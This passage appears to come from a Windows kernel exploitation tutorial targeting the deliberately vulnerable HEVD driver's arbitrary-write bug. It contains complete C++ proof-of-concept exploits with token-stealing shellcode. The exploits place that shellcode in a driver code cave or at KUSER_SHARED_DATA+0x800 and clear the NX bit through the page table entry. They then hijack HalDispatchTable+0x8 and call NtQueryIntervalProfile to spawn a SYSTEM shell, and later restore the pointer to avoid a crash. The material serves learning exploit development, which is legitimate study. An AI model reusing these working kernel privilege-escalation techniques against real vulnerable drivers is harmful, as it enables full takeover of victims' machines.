        return driverBase;
    }
    
    uintptr_t MiGetPte(LPVOID lpMemory) {
        uintptr_t addr = reinterpret_cast<uintptr_t>(lpMemory);
    
        uintptr_t calc1 = addr >> 9; // shr rcx, 9 
        uintptr_t calc2 = calc1 & 0x7FFFFFFFF8; // and rax, rcx
    
        return calc2;
    }
    
    int main()
    {
        WRITE_WHAT_WHERE input;
        BOOL success; // DeviceIoControl returns a BOOL, not an NTSTATUS
    
        printf("[+] Opening handle to driver\n");
        HANDLE hDriver = CreateFileW(
            L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
            FILE_SHARE_WRITE,
            nullptr,
            OPEN_EXISTING,
            0,
            nullptr);
    
        if (hDriver == INVALID_HANDLE_VALUE)
        {
            printf("[!] Failed to open handle: %lu\n", GetLastError());
            return 1;
        }
    
        LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe");
        printf("[+] Nt base address: %p\n", nt_addr);
        LPVOID hevd_addr = getbaseaddress(L"HEVD.sys");
        printf("[+] HEVD base address: %p\n", hevd_addr);
    
        LPVOID shellcode_start = (LPVOID)((uintptr_t)hevd_addr + 0x3000 + 0x20);
        LPVOID kernelShellcode = (LPVOID)((uintptr_t)hevd_addr + 0x3000 + 0x20);
        printf("[+] Address of Shellcode in kernel space: %p\n", shellcode_start);
    
        // Step 2
    
        BYTE shellcode[] = {
            0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
            0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x49, 0x89,
            0xC0, 0x4D, 0x8B, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49,
            0x81, 0xE8, 0x48, 0x04, 0x00, 0x00, 0x4D, 0x8B, 0x88,
            0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xF9, 0x04, 0x75,
            0xE5, 0x49, 0x8B, 0x88, 0xB8, 0x04, 0x00, 0x00, 0x80,
            0xE1, 0xF0, 0x48, 0x89, 0x88, 0xB8, 0x04, 0x00, 0x00,
            0x31, 0xC0, 0xC3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
        };
    
        size_t size = sizeof(shellcode);
        size_t num_chunks = size / 8;
    
        uint64_t* chunks = new uint64_t[num_chunks];
    
        for (size_t i = 0; i < num_chunks; i++) {
            std::memcpy(&chunks[i], &shellcode[i * 8], 8);
    
            input.WHAT = (LPVOID)(&chunks[i]);
            input.WHERE = (LPVOID)(shellcode_start);
    
            printf("[+] Calling TriggerArbitraryWrite to Write Shellcode in 0x%p....", shellcode_start);
    
            success = DeviceIoControl(
                hDriver,
                WRITE_WHAT_WHERE_IOCTL,
                &input,
                sizeof(input),
                nullptr,
                0,
                nullptr,
                nullptr);
    
            if (success) {
                printf("success\n");
            }
            else {
                printf("failed\n");
                return 1;
            }
    
            shellcode_start = (LPVOID)((uintptr_t)shellcode_start + 0x8);
    
        }
        delete[] chunks;
    
        getchar();
        
        LPVOID PteBase = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
        printf("[+] Allocated region to read MiGetPteAddress+0x13 Address: %p\n", PteBase);
    
        input.WHAT = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13);
        input.WHERE = (LPVOID)(PteBase);
    
        printf("[+] Calling TriggerArbitraryWrite....");
    
        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
    
        LPVOID* basePTE = (LPVOID*)PteBase;
        printf("[+] Base address of PTE: %p\n", *basePTE);
    
        uintptr_t ShellcodePte = MiGetPte(kernelShellcode);
    
        uintptr_t actualPTE = (uintptr_t)*basePTE + ShellcodePte;
        printf("[+] PTE of shellcode address: %p\n", actualPTE);
    
        getchar();
    
        // Step 3
    
        LPVOID pfnShellcode = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
        printf("[+] Allocated region to read PFN of shellcode: %p\n", pfnShellcode);
    
        input.WHAT = (LPVOID)(actualPTE);
        input.WHERE = (LPVOID)(pfnShellcode);
    
        printf("[+] Calling TriggerArbitraryWrite....");
    
        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
    
        LPVOID* pfn = (LPVOID*)pfnShellcode;
        printf("[+] PFN of shellcode address: %p\n", *pfn);
    
        getchar();
    
        // Step 4
    
        uintptr_t modifiedPFN = (uintptr_t)*pfn & 0x0FFFFFFFFFFFFFFF;
        printf("[+] Modified PFN of shellcode with \"E\" flag: %p\n", modifiedPFN);
    
        input.WHAT = (LPVOID)(&modifiedPFN);
        input.WHERE = (LPVOID)(actualPTE);
    
        printf("[+] Calling TriggerArbitraryWrite....");
    
        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
    
        getchar();
    
        // Step 5
    
        input.WHAT = (LPVOID)(&kernelShellcode);
        input.WHERE = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8);
        printf("[+] Overwriting HalDispatchTable+0x8 with: %p\n", kernelShellcode);
        printf("[+] Calling TriggerArbitraryWrite....");
    
        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
    
        getchar();
    
        // Step 6
    
        pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress(
            GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile");
    
        if (!NtQueryIntervalProfile) {
            printf("[-] Unable to find ntdll!NtQueryIntervalProfile\n");
            return 1;
        }
    
        printf("[+] Found ntdll!NtQueryIntervalProfile\n");
        printf("[+] Calling nt!NtQueryIntervalProfile to execute nt!HalDispatchTable+0x8...\n");
    
        ULONG x = 0;
        NtQueryIntervalProfile(
            0x1337,
            &x
        );
    
        printf("[+] Spawning a shell with elevated privileges\n\n");
        system("cmd");
    
        return 0;
    }
    
    

Method (3) - KUSER_SHARED_DATA

Now that we know how to exploit this WRITE-WHAT-WHERE, there is one more common method: instead of writing to the driver’s code cave, we can use the KUSER_SHARED_DATA structure.

According to Microsoft: Source

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

The KUSER_SHARED_DATA structure has been abused in Windows kernel exploitation for a while now. As the article states, its address is always static in both kernel and user space, and the kernel-mode mapping has READ and WRITE permissions. This was fixed after Windows 10 Insider Preview build 20246. However, my current Windows 10 Pro build 19045 (22H2), which is the latest version, does not seem to have the fix yet.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Checking the static address (0xFFFFF78000000000), there is some data written here already. Those are the values used by the KUSER_SHARED_DATA structure itself.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Checking the structure size, it is 0x720 bytes in total. The Microsoft article mentions that a single page (4 KB) is allocated for it, which leaves 0x1000 - 0x720 = 0x8E0 bytes available for our use.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png
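
The arithmetic above can be written down as a quick sanity check. This is a minimal sketch, assuming the 0x720 structure size observed on this build and a 72-byte shellcode buffer (the size of the shellcode array in the POC). The names kPageSize, kStructSize, free_bytes and fits_in_cave are my own, and 0x800 is just a candidate offset inside the free area.

```cpp
#include <cassert>
#include <cstddef>

constexpr std::size_t kPageSize   = 0x1000; // one 4 KB page backs KUSER_SHARED_DATA
constexpr std::size_t kStructSize = 0x720;  // structure size on this build (may differ elsewhere)

// Bytes left in the page after the structure itself.
constexpr std::size_t free_bytes() {
    return kPageSize - kStructSize;
}

// True if [offset, offset + length) starts past the structure and ends inside the page.
constexpr bool fits_in_cave(std::size_t offset, std::size_t length) {
    return offset >= kStructSize && offset <= kPageSize && length <= kPageSize - offset;
}

void cave_examples() {
    assert(free_bytes() == 0x8E0);
    assert(fits_in_cave(0x800, 72));   // candidate offset, 72-byte shellcode
    assert(!fits_in_cave(0x700, 72));  // would overlap the structure
    assert(!fits_in_cave(0xFE0, 72));  // would run past the end of the page
}
```

If the structure grows on another build, only kStructSize needs to change for the check to stay meaningful.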

Since we don’t want to touch the KUSER_SHARED_DATA structure itself, let’s leave that space alone and find a location for our shellcode past it. I decided to pick KUSER_SHARED_DATA + 0x800, and we can see it is empty, so we have a static code cave. The region has READ and WRITE permissions but not EXECUTE, but that’s fine: using the WRITE-WHAT-WHERE, we can change that.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Let’s give this a try. The methodology is the same as in “Method (2)” with one change: instead of the HEVD code cave address, we use the static KUSER_SHARED_DATA address.

  • shellcode_start and kernelShellcode are now set to the KUSER_SHARED_DATA + 0x800 address.
int main()
{
    WRITE_WHAT_WHERE input;
    BOOL success; // DeviceIoControl returns a BOOL, not an NTSTATUS

    printf("[+] Opening handle to driver\n");
    HANDLE hDriver = CreateFileW(
        L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
        FILE_SHARE_WRITE,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);

    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Failed to open handle: %lu\n", GetLastError());
        return 1;
    }

    LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe");
    printf("[+] Nt base address: %p\n", nt_addr);

    LPVOID shellcode_start = (LPVOID)(0xFFFFF78000000000 + 0x800); // KUSER_SHARED_DATA + 0x800
    LPVOID kernelShellcode = (LPVOID)(0xFFFFF78000000000 + 0x800); // KUSER_SHARED_DATA + 0x800
    printf("[+] Address of Shellcode in kernel space: %p\n", shellcode_start);

    // Step 2

    BYTE shellcode[] = {
        0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
        0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x49, 0x89,
        0xC0, 0x4D, 0x8B, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49,
        0x81, 0xE8, 0x48, 0x04, 0x00, 0x00, 0x4D, 0x8B, 0x88,
        0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xF9, 0x04, 0x75,
        0xE5, 0x49, 0x8B, 0x88, 0xB8, 0x04, 0x00, 0x00, 0x80,
        0xE1, 0xF0, 0x48, 0x89, 0x88, 0xB8, 0x04, 0x00, 0x00,
        0x31, 0xC0, 0xC3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
    };

    size_t size = sizeof(shellcode);
    size_t num_chunks = size / 8;

    uint64_t* chunks = new uint64_t[num_chunks];

    for (size_t i = 0; i < num_chunks; i++) {
        std::memcpy(&chunks[i], &shellcode[i * 8], 8);

        input.WHAT = (LPVOID)(&chunks[i]);
        input.WHERE = (LPVOID)(shellcode_start);

        printf("[+] Calling TriggerArbitraryWrite to Write Shellcode in 0x%p....", shellcode_start);

        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);

        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }

        shellcode_start = (LPVOID)((uintptr_t)shellcode_start + 0x8);

    }
    
  [ THE REST IS THE SAME ]
  
  }

I updated and executed the POC, and the shellcode was written to the KUSER_SHARED_DATA + 0x800 (0xFFFFF78000000800) address. I can confirm this using WinDbg.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png
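
Since the primitive writes 8 bytes per call, the shellcode has to be cut into 8-byte pieces, each with its own destination. Here is a small standalone sketch of that splitting. Unlike the POC, which pads the array by hand with 0xff bytes, this version pads the tail automatically. The helper names to_qwords and chunk_destination are hypothetical, and the result assumes a little-endian host such as x64.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Splits a byte buffer into 8-byte values, padding the tail with `pad`
// so no trailing bytes are dropped when the length is not a multiple of 8.
std::vector<std::uint64_t> to_qwords(const std::vector<std::uint8_t>& bytes, std::uint8_t pad) {
    std::vector<std::uint8_t> padded(bytes);
    while (padded.size() % 8 != 0) {
        padded.push_back(pad);
    }
    std::vector<std::uint64_t> out(padded.size() / 8);
    if (!padded.empty()) {
        std::memcpy(out.data(), padded.data(), padded.size());
    }
    return out;
}

// Address at which the chunk with the given index has to be written.
std::uint64_t chunk_destination(std::uint64_t base, std::size_t index) {
    return base + index * 8;
}

void chunk_examples() {
    // xor eax, eax ; ret  (the last three real bytes of the POC shellcode)
    std::vector<std::uint64_t> q = to_qwords({0x31, 0xC0, 0xC3}, 0x90);
    assert(q.size() == 1);
    assert(q[0] == 0x9090909090C3C031ULL); // little-endian view of 31 C0 C3 90 90 90 90 90
    // A 72-byte buffer yields 9 chunks; the last one lands at base + 0x40.
    assert(chunk_destination(0xFFFFF78000000800ULL, 8) == 0xFFFFF78000000840ULL);
}
```

Each element of the returned vector would be one WHAT buffer, and chunk_destination gives the matching WHERE.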

The next step is calculating the PTE address of KUSER_SHARED_DATA + 0x800 and reading the PTE bits/flags. The values retrieved match the output of the !pte command.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png
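
As a worked example of the calculation, the sketch below repeats the arithmetic of MiGetPte() from the POC and adds a PTE base. The base value 0xFFFFF68000000000 is an assumption for illustration only: it is the old fixed base, while current builds randomize it, which is why the POC reads the real one from MiGetPteAddress+0x13. The function names pte_offset and pte_address are mine.

```cpp
#include <cassert>
#include <cstdint>

// Byte offset of the PTE that maps `va`, relative to the PTE base.
// Same arithmetic as MiGetPte() in the POC: (va >> 9) & 0x7FFFFFFFF8.
constexpr std::uint64_t pte_offset(std::uint64_t va) {
    return (va >> 9) & 0x7FFFFFFFF8ULL;
}

// Final PTE address once the (leaked) PTE base is known.
constexpr std::uint64_t pte_address(std::uint64_t pte_base, std::uint64_t va) {
    return pte_base + pte_offset(va);
}

void pte_examples() {
    const std::uint64_t assumedBase = 0xFFFFF68000000000ULL; // illustrative, not the leaked value
    const std::uint64_t cave        = 0xFFFFF78000000800ULL; // KUSER_SHARED_DATA + 0x800

    assert(pte_offset(cave) == 0x7BC0000000ULL);
    assert(pte_address(assumedBase, cave) == 0xFFFFF6FBC0000000ULL);
    // Both addresses are in the same 4 KB page, so they share one PTE.
    assert(pte_offset(cave) == pte_offset(0xFFFFF78000000000ULL));
}
```

On a live system the second argument stays the same and only the base changes per boot.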

Modified the bits/flags and cleared the no eXecute bit on our shellcode region:

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png
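
For reference, the no eXecute flag is bit 63 of an x64 PTE, so clearing that single bit is enough to make the page executable. The POC uses the wider mask 0x0FFFFFFFFFFFFFFF, which also clears bits 60 to 62. The sketch below compares the two on made-up PTE values; the helper names and the sample values are assumptions for illustration.

```cpp
#include <cassert>
#include <cstdint>

constexpr std::uint64_t kNxBit = 1ULL << 63; // bit 63 of an x64 PTE is the no-execute bit

constexpr bool is_executable(std::uint64_t pte) {
    return (pte & kNxBit) == 0;
}

// Clears only the NX bit and leaves every other bit untouched.
constexpr std::uint64_t clear_nx(std::uint64_t pte) {
    return pte & ~kNxBit;
}

// The mask used in the POC: clears the top four bits (60 to 63).
constexpr std::uint64_t poc_mask(std::uint64_t pte) {
    return pte & 0x0FFFFFFFFFFFFFFFULL;
}

void nx_examples() {
    const std::uint64_t a = 0x8A00000012345863ULL; // made-up PTE, only bit 63 set in the top nibble
    assert(!is_executable(a));
    assert(clear_nx(a) == 0x0A00000012345863ULL);
    assert(poc_mask(a) == clear_nx(a));            // identical when bits 60 to 62 are already zero

    const std::uint64_t b = 0xC000000012345863ULL; // made-up PTE with bit 62 set as well
    assert(clear_nx(b) == 0x4000000012345863ULL);  // bit 62 survives
    assert(poc_mask(b) == 0x0000000012345863ULL);  // bit 62 is cleared too
    assert(is_executable(clear_nx(b)) && is_executable(poc_mask(b)));
}
```

Both variants make the page executable; the narrower mask simply changes less of the entry.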

And the HalDispatchTable is also overwritten successfully:

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Finally, by calling NtQueryIntervalProfile(), we got SYSTEM:

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Everything seems fine, but sometimes I get a CRITICAL_STRUCTURE_CORRUPTION BSOD after the SYSTEM shell is spawned. Most likely an integrity check (possibly Kernel Patch Protection, which raises this bug check) kicks in and finds that HalDispatchTable was modified and not yet reverted to its original state.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

To fix this, I added a step that saves the original value before overwriting nt!HalDispatchTable+0x8.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Basically it’s a pointer to nt!HalpSetSystemInformation and now we have a backup of this pointer.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

After overwriting the pointer with our kernel-space shellcode address and executing the shellcode, we can restore the original value.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

The NtQueryIntervalProfile() call executes our shellcode, and we then revert nt!HalDispatchTable+0x8 before spawning a new cmd.exe.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Checking HalDispatchTable again, it has been reverted.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png
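
The backup, overwrite and restore sequence can also be expressed as a small scope guard, so the restore cannot be forgotten on an early return. This is only a sketch of the idea, not what the POC does (the POC restores explicitly after the trigger call). The driver primitive is modelled by a plain 8-byte memcpy, and the names WritePrimitive and ScopedPointerSwap are hypothetical.

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>
#include <functional>
#include <utility>

// Stand-in for the driver primitive: copy 8 bytes from *what to *where.
using WritePrimitive = std::function<void(const void* what, void* where)>;

class ScopedPointerSwap {
public:
    ScopedPointerSwap(WritePrimitive write, void* slot, std::uint64_t replacement)
        : write_(std::move(write)), slot_(slot) {
        write_(slot_, &original_);   // "read": copy the current slot value into our backup
        write_(&replacement, slot_); // overwrite the slot with the new pointer
    }
    ~ScopedPointerSwap() {
        write_(&original_, slot_);   // put the original value back
    }
    ScopedPointerSwap(const ScopedPointerSwap&) = delete;
    ScopedPointerSwap& operator=(const ScopedPointerSwap&) = delete;

    std::uint64_t original() const { return original_; }

private:
    WritePrimitive write_;
    void* slot_;
    std::uint64_t original_ = 0;
};

void swap_example() {
    // In user mode a memcpy plays the role of the IOCTL (assumption for this sketch).
    WritePrimitive copy8 = [](const void* what, void* where) { std::memcpy(where, what, 8); };
    std::uint64_t slot = 0x1111; // pretend this is HalDispatchTable+0x8
    {
        ScopedPointerSwap guard(copy8, &slot, 0x2222);
        assert(slot == 0x2222);             // overwritten while the guard is alive
        assert(guard.original() == 0x1111); // backup taken first
    }
    assert(slot == 0x1111);                 // restored when the guard goes out of scope
}
```

In a real exploit the lambda would wrap the DeviceIoControl call, and the trigger would run inside the guarded scope.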

  • Full POC:

    #include <Windows.h>
    #include <stdio.h>
    #include <psapi.h>
    #include <cstdint>
    #include <cstring>
    
    #define WRITE_WHAT_WHERE_IOCTL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS)
    
    typedef struct _WRITE_WHAT_WHERE {
        void* WHAT;
        void* WHERE;
    } WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;
    
    typedef NTSTATUS(WINAPI* pNtQueryIntervalProfile)(IN ULONG ProfileSource, OUT PULONG Interval);
    
    PVOID getbaseaddress(LPCWSTR name)
    {
        BOOL status;
        LPVOID* pImageBase;
        DWORD ImageSize;
        WCHAR driverName[1024];
        LPVOID driverBase = nullptr;
    
        status = EnumDeviceDrivers(nullptr, 0, &ImageSize);
    
        pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    
        status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize);
    
        int driver_count = ImageSize / sizeof(pImageBase[0]);
    
        for (int i = 0; i < driver_count; i++) {
            // nSize is a character count, so divide by the size of a WCHAR, not a char
            GetDeviceDriverBaseNameW(pImageBase[i], driverName, sizeof(driverName) / sizeof(driverName[0]));
    
            if (!wcscmp(name, driverName)) {
                driverBase = pImageBase[i];
                break;
            }
        }
    
        return driverBase;
    }
    
    uintptr_t MiGetPte(LPVOID lpMemory) {
        uintptr_t addr = reinterpret_cast<uintptr_t>(lpMemory);
    
        uintptr_t calc1 = addr >> 9; // shr rcx, 9 
        uintptr_t calc2 = calc1 & 0x7FFFFFFFF8; // and rax, rcx
    
        return calc2;
    }
    
    int main()
    {
        WRITE_WHAT_WHERE input;
        BOOL success; // DeviceIoControl returns a BOOL, not an NTSTATUS
    
        printf("[+] Opening handle to driver\n");
        HANDLE hDriver = CreateFileW(
            L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
            FILE_SHARE_WRITE,
            nullptr,
            OPEN_EXISTING,
            0,
            nullptr);
    
        if (hDriver == INVALID_HANDLE_VALUE)
        {
            printf("[!] Failed to open handle: %lu\n", GetLastError());
            return 1;
        }
    
        LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe");
        printf("[+] Nt base address: %p\n", nt_addr);
    
        LPVOID shellcode_start = (LPVOID)(0xFFFFF78000000000 + 0x800); // KUSER_SHARED_DATA + 0x800
        LPVOID kernelShellcode = (LPVOID)(0xFFFFF78000000000 + 0x800); // KUSER_SHARED_DATA + 0x800
        printf("[+] Address of Shellcode in kernel space: %p\n", shellcode_start);
    
        // Step 2
    
        BYTE shellcode[] = {
            0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
            0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x49, 0x89,
            0xC0, 0x4D, 0x8B, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49,
            0x81, 0xE8, 0x48, 0x04, 0x00, 0x00, 0x4D, 0x8B, 0x88,
            0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xF9, 0x04, 0x75,
            0xE5, 0x49, 0x8B, 0x88, 0xB8, 0x04, 0x00, 0x00, 0x80,
            0xE1, 0xF0, 0x48, 0x89, 0x88, 0xB8, 0x04, 0x00, 0x00,
            0x31, 0xC0, 0xC3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
        };
    
        size_t size = sizeof(shellcode);
        size_t num_chunks = size / 8;
    
        uint64_t* chunks = new uint64_t[num_chunks];
    
        for (size_t i = 0; i < num_chunks; i++) {
            std::memcpy(&chunks[i], &shellcode[i * 8], 8);
    
            input.WHAT = (LPVOID)(&chunks[i]);
            input.WHERE = (LPVOID)(shellcode_start);
    
            printf("[+] Calling TriggerArbitraryWrite to Write Shellcode in 0x%p....", shellcode_start);
    
            success = DeviceIoControl(
                hDriver,
                WRITE_WHAT_WHERE_IOCTL,
                &input,
                sizeof(input),
                nullptr,
                0,
                nullptr,
                nullptr);
    
            if (success) {
                printf("success\n");
            }
            else {
                printf("failed\n");
                return 1;
            }
    
            shellcode_start = (LPVOID)((uintptr_t)shellcode_start + 0x8);
    
        }
        delete[] chunks;
    
        getchar();
    
        // Step 3
    
        LPVOID PteBase = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
        printf("[+] Allocated region to read MiGetPteAddress+0x13 Address: %p\n", PteBase);
    
        input.WHAT = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13);
        input.WHERE = (LPVOID)(PteBase);
    
        printf("[+] Calling TriggerArbitraryWrite....");
    
        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
    
        LPVOID* basePTE = (LPVOID*)PteBase;
        printf("[+] Base address of PTE: %p\n", *basePTE);
    
        uintptr_t ShellcodePte = MiGetPte(kernelShellcode);
    
        uintptr_t actualPTE = (uintptr_t)*basePTE + ShellcodePte;
        printf("[+] PTE of shellcode address: %p\n", actualPTE);
    
        getchar();
    
        LPVOID pfnShellcode = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
        printf("[+] Allocated region to read PFN of shellcode: %p\n", pfnShellcode);
    
        input.WHAT = (LPVOID)(actualPTE);
        input.WHERE = (LPVOID)(pfnShellcode);
    
        printf("[+] Calling TriggerArbitraryWrite....");
    
        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
    
        LPVOID* pfn = (LPVOID*)pfnShellcode;
        printf("[+] PFN of shellcode address: %p\n", *pfn);
    
        getchar();
    
        // Step 4
    
        uintptr_t modifiedPFN = (uintptr_t)*pfn & 0x0FFFFFFFFFFFFFFF;
        printf("[+] Modified PFN of shellcode with \"E\" flag: %p\n", modifiedPFN);
    
        input.WHAT = (LPVOID)(&modifiedPFN);
        input.WHERE = (LPVOID)(actualPTE);
    
        printf("[+] Calling TriggerArbitraryWrite....");
    
        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
    
        getchar();
    
        // Step 5
    
        LPVOID halPointer = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
        printf("[+] Allocated region to read HalDispatchTable+0x8 pointer: %p\n", halPointer);
    
        input.WHAT = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8); // HalDispatchTable+0x8
        input.WHERE = (LPVOID)(halPointer);
    
        printf("[+] Calling TriggerArbitraryWrite....");
    
        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
    
        LPVOID* hal0x8 = (LPVOID*)halPointer;
        printf("[+] Original pointer stored in HalDispatchTable+0x8: %p\n", *hal0x8);
    
        getchar();
    
        // Step 6
    
        input.WHAT = (LPVOID)(&kernelShellcode);
        input.WHERE = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8); // HalDispatchTable+0x8
        printf("[+] Overwriting HalDispatchTable+0x8 with: %p\n", kernelShellcode);
        printf("[+] Calling TriggerArbitraryWrite....");
    
        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
    
        getchar();
    
        // Step 7
    
        pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress(
            GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile");
    
        if (!NtQueryIntervalProfile) {
            printf("[-] Unable to find ntdll!NtQueryIntervalProfile\n");
            return 1;
        }
    
        printf("[+] Found ntdll!NtQueryIntervalProfile\n");
        printf("[+] Calling nt!NtQueryIntervalProfile to execute nt!HalDispatchTable+0x8...\n");
    
        ULONG x = 0;
        NtQueryIntervalProfile(
            0x1337,
            &x
        );
    
        // Step 8
    
        printf("[+] Reverting HalDispatchTable+0x8 to its original state...\n");
        input.WHAT = (LPVOID)(hal0x8); 
        input.WHERE = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8); // HalDispatchTable+0x8
    
        printf("[+] Calling TriggerArbitraryWrite....");
    
        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
    
        getchar();
    
        printf("[+] Spawning a shell with elevated privileges\n\n");
        system("cmd");
    
        return 0;
    }
    

Method (4) - HVCI (Memory Integrity) Enabled

All of the above attacks worked with Virtualization-based Security (VBS) enabled but with Hypervisor-Enforced Code Integrity (HVCI), also called Memory Integrity, disabled in the VM.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

I enabled HVCI, restarted the machine and tried the above exploits again, which ended with the following error:

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

